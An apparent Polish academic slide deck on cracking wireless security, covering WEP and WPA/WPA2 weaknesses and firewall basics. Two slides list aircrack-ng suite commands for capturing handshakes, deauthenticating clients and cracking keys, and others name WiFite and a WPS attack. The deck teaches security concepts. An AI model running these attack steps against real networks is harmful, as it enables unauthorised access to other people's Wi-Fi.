Łamanie
zabezpieczeń
sieci
bezprzewodowyc
h

Adrian Kabała

Krakowska Akademia

im. Andrzeja Frycza Modrzewskiego

Kierunek: Informatyka i ekonometria

Promotor: prof. zw. Dr hab. Tadeusza Grabińskiego

Bezpieczeństwo w sieci
Internet

jest bardzo ważnym aspektem użytkowania

Internetu.

Zagrożenia płynące z Internetu – metody ataków:



Ataki z zewnątrz sieci lokalnej

(DoS, wirusy, XSS,

penetracja poprzez sieć bezprzewodową)



Ataki z wnętrza sieci lokalnej

(ARP, RARP)

Klasy ataków:



Ataki pasywne – podsłuchiwanie



Ataki aktywne – modyfikacja i spreparowanie danych

Ochrona poprzez Firewall



Blokowanie dostępu do usług i komponentów dla osób,

które nie powinny mieć do nich dostępu



Ochrona systemów przed atakami na dziurawe

oprogramowanie sieciowe



Ochrona dziurawych systemów operacyjnych



Zapobieganie podsłuchiwaniu oraz wyciekom informacji

z sieci wew.



Ochrona przed fałszowaniem adresów IP



Wydzielanie fragmentów sieci o zróżnicowanym

poziomie bezpieczeństwa

Typy firewalli

a)

Zapory lokalne

b)

Zapory filtrujące

c)

Zapory proxy

Bezpieczeństwo sieci WEP



WEP

(1997r.)



2001 – Pierwszy artukuł FMS.



2002 – Udoskonalenie o kolejne bajty

obliczeń



2004 – KoreK



Algorytm RC4



Zarządzanie kluczami KSA



Produkowanie strumienia szyfrującego

PRGA

Uwierzytelnianie w WEP

1. Uwierzytelnianie otwarte (OSA)

2. Uwierzytelnianie kluczem współdzielonym (SKA)

3. Weryfikacja MAC

Słabość WEP



Tylko 16777216 różnych możliwych wartości
IV



Obecność słabych wartości IV



Inicjalizacja resetuje sekwencje wektora IV



Chop-Chop

Atak na sieć WEP



airodump-ng wlan0



airodump-ng -c 1 –bssid
00:16:B6:D9:58:71 wlan0 –w nazwa_pliku



aireplay-ng -0 1 –a 00:16:b6:d9:58:71 –c
00:60:b3:d4:51:f3 wlan0



aircrack-ng /root/testka/test-01.cap

Hasło: A1:A2:A3:A4:A5

Bezpieczeństwo sieci WPA i

WPA2

WPA (2003 r.) WPA2(2004r.)

•Personal (TKIP, CCMP)

•Enterprise - Radius

Zarządzanie
kluczami i
uwierzytelnian
ie

PMK – klucz główny
PTK – dla TKIP: 2 x EAPOL, TEK,
MIC.
PTK – dla CCMP: – 2 x EAPOL,
TK

Słabość WPA i WPA2

PMK = PBKDF2 (hasło, SSID, ssidLength, 4096,

256)

PTK = HMAC, 2x MAC, 2x ID Nonces

Tablice tęczowe

• Szybkość
• Oszczędność mocy obliczeniowej
• Duża ilość haseł
• Słaba dostępność

Atak na sieć WPA/WPA2-PSK

1.

Backtrack

2.

airodump-ng mon0

3.

airodump-ng –c 6 -–bbsid 00:1E:E5:99:08:78
–w /root/armagedon mon0

4.

aireplay-ng –0 1 -a 00:1E:E5:99:08:78 –c
2:E0:2C:5E:4F:DB mon0

5.

aircrack-ng –w słownik.txt –b
00:1E:E5:99:08:78 /root/Armagedon-01.cap



WiFite – łatwiej się nie da.



Atak Wi-Fi Protected Setup



Skrypt pobierający hasła

Dziękuję za uwagę